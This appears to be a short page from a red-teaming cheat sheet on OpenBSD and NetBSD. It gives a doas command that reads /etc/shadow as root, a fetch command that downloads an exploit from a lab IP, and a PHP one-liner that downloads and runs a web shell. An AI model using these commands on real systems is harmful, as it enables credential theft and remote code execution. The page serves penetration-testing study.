Red Teaming and Malware Analysis
@sirpedrotavares
seguranca-informatica.pt
0xSI_f33d
Search…
About
Red Teaming
Cheat Sheet
Web
Active Directory
Services by port
Hardening
Stuff
Basic tips/scripts
OpenBSD & NetBSD
File Transfer
Pivoting
Active Directory 101
Fuzzing and Web
Initial Foothold
Privilege Escalation (Privesc)
Lateral Movement (Pivoting)
Persistence
Command and Control (C&C)
Data Exfiltration
CVE & Exploits / CTF
Tools
Resources
Malware Analysis
Unpacking
Basic tips
Malware instrumentation with frida
Tools
Resources
Mobile
Tools
Reverse iOS ipa
Reverse Android APKs
Basic tips
Resources
IoT / Reverse / Firmware
Basic tips
Reverse IoT devices
Tools
Resources
Powered By
GitBook
OpenBSD & NetBSD
​
doas
​
Execute commands as another user.
1
doas -u root cat /etc/shadow
Copied!
fetch (curl)
1
fetch http://10.11.0.244/exploit.c
2
<?php system("fetch -o /usr/local/databases/shell.php http://10.11.0.244/shell.php; php /usr/local/databases/shell.php"); ?>
Copied!
Previous
Basic tips/scripts
Next
File Transfer
Last modified
1yr ago
Copy link
Contents
doas
fetch (curl)